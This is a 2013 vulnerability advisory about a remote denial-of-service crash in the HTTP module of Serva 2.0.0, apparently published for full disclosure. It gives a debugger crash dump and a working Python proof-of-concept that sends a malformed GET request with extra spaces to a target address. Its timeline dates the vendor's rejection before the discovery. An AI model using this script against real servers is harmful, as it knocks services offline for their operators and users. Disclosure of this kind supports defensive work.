Inshell Security Advisory
http://www.inshell.net
Product: Serva
Vendor URL: www.vercot.com
Type: Uncaught Exception [CWE-248]
Date found: 2012-12-07
Date published: 2013-01-14
CVSSv2 Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE: -
This vulnerability was discovered and researched by Julien Ahrens from
Inshell Security.
Serva 2.0.0, older versions may be affected too.
Serva v2.0.0 suffers from a Remote Denial of Service Vulnerability in
the HTTP module.
The application uses a space delimiter to parse a GET Request. Adding
more than one space (\x20) behind the GET will cause the application to
crash with an unhandled c++ exception.
(b50.18c): Unknown exception - code 000006d9 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (first chance)
(b50.a9c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=017d6668 ebx=00000000 ecx=00000000 edx=00000003 esi=017d66f0
edi=ffffffff
eip=7c812afb esp=017d6664 ebp=017d66b8 iopl=0 nv up ei pl nz na
pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
kernel32!RaiseException+0x53:
7c812afb 5e pop esi
#!/usr/bin/python
import socket
target="192.168.0.21"
port=80
payload = (
"\x47\x45\x54\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)
print "[*] Connecting to Target " + target + "β¦"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((target, port))
print "[*] Connected to " + target + "!"
except:
print "[!] " + target + " didn't respond\n"
sys.exit(0)
print "[*] Sending malformed requestβ¦"
s.send(payload)
print "[!] Exploit has been sent!\n"
s.close()
For further Screenshots and/or PoCs visit:
http://security.inshell.net/advisory/34
None
2012-12-07: Initial notification sent to vendor
2012-07-18: Vendor does not accept the bug
2013-01-14: Full Disclosure